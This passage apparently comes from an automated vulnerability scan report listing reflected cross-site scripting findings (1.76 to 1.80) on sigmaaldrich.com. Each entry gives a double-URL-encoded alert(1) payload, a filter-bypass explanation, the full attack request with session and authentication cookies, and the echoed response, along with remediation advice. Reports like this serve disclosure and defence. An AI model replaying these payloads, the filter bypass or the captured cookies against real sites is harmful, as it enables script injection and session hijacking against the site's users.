Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content68a09";alert(1)//19b43806d4c/safc-pharma/en-us/home/small-molecule-api/services-overview","E404") ;
   </script>
...[SNIP]...

1.76. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/small-molecule-api/services-overview [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/small-molecule-api/services-overview

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6c9a%2522%253balert%25281%2529%252f%252fb2927071e03 was submitted in the REST URL parameter 2. This input was echoed as f6c9a";alert(1)//b2927071e03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/f6c9a%2522%253balert%25281%2529%252f%252fb2927071e03/en-us/home/small-molecule-api/services-overview HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/f6c9a";alert(1)//b2927071e03/en-us/home/small-molecule-api/services-overview","E404") ;
   </script>
...[SNIP]...

1.77. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0a76%2522%253balert%25281%2529%252f%252f6370404ea8b was submitted in the REST URL parameter 1. This input was echoed as a0a76";alert(1)//6370404ea8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta0a76%2522%253balert%25281%2529%252f%252f6370404ea8b/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:45 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contenta0a76";alert(1)//6370404ea8b/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.78. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c772%2522%253balert%25281%2529%252f%252f055e4b14ac2 was submitted in the REST URL parameter 2. This input was echoed as 1c772";alert(1)//055e4b14ac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1c772%2522%253balert%25281%2529%252f%252f055e4b14ac2/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1c772";alert(1)//055e4b14ac2/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.79. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42f4a%2522%253balert%25281%2529%252f%252fcc9d2f2abe8 was submitted in the REST URL parameter 3. This input was echoed as 42f4a";alert(1)//cc9d2f2abe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest42f4a%2522%253balert%25281%2529%252f%252fcc9d2f2abe8/analytical-chromatography/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:48 GMT
Content-Length: 29003
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest42f4a";alert(1)//cc9d2f2abe8/analytical-chromatography/analytical-chromatography-catalog","E404") ;
   </script>
...[SNIP]...

1.80. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/analytical-chromatography/analytical-chromatography-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd50%2522%253balert%25281%2529%252f%252f8a5dab69c77 was submitted in the REST URL parameter 4. This input was echoed as abd50";alert(1)//8a5dab69c77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/analytical-chromatographyabd50%2522%253balert%25281%2529%252f%252f8a5dab69c77/analytical-chromatography-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
